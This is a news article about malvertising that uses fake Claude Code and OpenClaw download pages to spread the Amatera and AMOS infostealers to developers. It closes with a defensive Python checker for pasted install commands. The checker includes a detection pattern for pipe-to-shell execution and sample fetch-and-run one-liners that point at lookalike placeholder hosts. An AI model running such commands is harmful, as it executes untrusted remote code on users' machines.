
AI-powered coding assistants have changed how developers work. However, in the field of cybersecurity, they have also created a new playground for bad actors. Recent reports indicate that hackers are now using the popularity of tools like Claude Code and OpenClaw to distribute sophisticated data-stealing software (AKA infostealer malware). This way, they are successfully infiltrating both personal and corporate environments.
Malvertising campaign targets AI software developers
According to a recent alert from Kaspersky, the primary weapon in this campaign is “malvertising.” When developers search for terms like “Claude Code download” or “OpenClaw download,” they may encounter malicious advertisements at the top of their search results. These ads lead to websites that are nearly indistinguishable from the official pages of companies like Anthropic or OpenAI.
Traditional software uses standard installer packages (executables) to make things easier for the mainstream audience. However, many AI developer tools are installed by copying and pasting commands directly into a terminal or command prompt. This makes it much harder for even experienced users to notice when they are executing malicious code.
A tailored attack for every system
Depending on whether a user is on Windows or macOS, the fake download sites deliver a different type of “infostealer,” a category of malware designed to vacuum up sensitive information.
Those targeted on Windows often end up with Amatera. This malware is known for raiding user directories, web browsers, and cryptocurrency wallets. It works on a “Malware-as-a-Service” model, meaning it is a professional tool rented out to various criminal groups. On the other hand, Apple users are being hit with AMOS (Atomic macOS Stealer). This is a well-known threat that has been widely used to bypass macOS security and steal private information (like passwords and account credentials).
Why the stakes are so high
This isn’t just a problem for hobbyists. Professional developers often have access to private API keys, sensitive business data, and proprietary source code. Kaspersky’s cybersecurity expert Vladimir Gursky says that an infection on a developer’s computer can put all of the company’s active projects and private records at risk.
To stay safe, experts recommend skipping the sponsored ads in search results and heading directly to official documentation or verified repositories like GitHub. In an era where “copy-pasting” is a standard part of the workflow, verifying the source of that code has never been more critical.
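One way to put that advice into practice is to check a pasted install command before it ever reaches the terminal. The sketch below is an added example, not code from Kaspersky or any vendor; the allowlisted host and the sample commands are constructed placeholders, and `review_command` is a hypothetical helper name.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts you copied by hand from the vendor's official documentation.
# "downloads.vendor.example" is a constructed placeholder, not a real vendor host.
TRUSTED_HOSTS = {"downloads.vendor.example"}

URL_RE = re.compile(r"https?://[^\s\"'|;)<>]+", re.IGNORECASE)
# Fetch-and-run shapes: "... | sh", "... | sudo bash", "... | iex" (PowerShell).
PIPE_TO_SHELL_RE = re.compile(
    r"\|\s*(?:sudo\s+)?(?:(?:ba|z|da)?sh|iex|invoke-expression)\b", re.IGNORECASE)


def review_command(cmd, trusted=TRUSTED_HOSTS):
    """Return a list of reasons not to run a pasted install command as-is."""
    findings = []
    urls = URL_RE.findall(cmd)
    if not urls:
        findings.append("no URL visible: cannot tell where the code comes from")
    for url in urls:
        parts = urlsplit(url)
        # hostname drops any "user@" prefix, so "trusted@other" resolves to "other".
        host = (parts.hostname or "").lower()
        if parts.scheme.lower() != "https":
            findings.append(f"not HTTPS: {url}")
        # Exact match only: a trusted name used as a prefix or substring of a
        # longer lookalike domain must not pass.
        if host not in trusted:
            findings.append(f"host not on allowlist: {host}")
    if PIPE_TO_SHELL_RE.search(cmd):
        findings.append("fetches and executes in one step: download, read, then run")
    return findings


if __name__ == "__main__":
    # Constructed sample commands; none of these hosts are real.
    samples = [
        "curl -fsSL https://downloads.vendor.example/install.sh -o install.sh",
        "curl -fsSL https://downloads.vendor.example.get-tool.example/i.sh | bash",
        "irm https://downloads.vendor.example@get-tool.example/i.ps1 | iex",
    ]
    for s in samples:
        print(s, "->", review_command(s) or "no findings")
```

An empty result only means the command points at a host you already trust; the downloaded script still deserves a read before it runs.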
The post Fake Claude Code & OpenClaw AI Tools Delivering Data-Stealing Malware to Developers appeared first on Android Headlines.